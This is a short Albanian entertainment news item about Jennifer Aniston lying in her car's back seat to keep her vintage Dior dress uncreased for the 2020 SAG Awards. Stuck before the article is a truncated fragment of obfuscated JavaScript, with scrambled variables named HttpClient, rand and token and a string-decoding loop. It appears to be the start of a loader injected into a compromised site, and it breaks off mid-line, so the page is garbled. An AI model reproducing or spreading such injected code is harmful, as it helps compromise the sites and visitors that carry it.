;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çfarë sakrifice bëri Jennifer Aniston që fustani që e veshi në SAG të mos rrudhej?

By

Jennifer Aniston padyshim që shkëlqeu me veshjen e saj në tapetin e kuq në SAG Awards 2020.

Por, kjo nuk ishte një gjë e lehtë për t’u bërë.

Aktorja e “Morning Show” kishte veshur një fustan vintage (të stilit të vjetër) – me material mëndafshi dhe ngjyrë të bardhë – të markës Dior nga John Galliano.

Por, në mënyrë që ky fustan delikat të mos rrudhej para se ajo të arrinte në tapetin e kuq, Aniston u detyrua që të shtrihej në ulëset e prapme të veturës së saj.

“Pa rrudha…më e vështirë se sa duket”, kishte shkruar ajo poshtë fotografisë në Instagram ku shihej se në çfarë pozite të papërshtatshme kishte qenë ajo në makinë gjatë rrugës për në tapetin e kuq.

Aniston ka postuar edhe një fotografi të çmimit që e ka fituar të cilën e kishte vendosur në qoshen e vaskës së saj.

“Diku në mes të këtyre dy fotografive, miqtë e mi më kanë dhënë dhuratën që do ta çmoj gjithmonë dhe një natë që s’do ta harroj asnjëherë”.

 

Artikuj të ngjashëm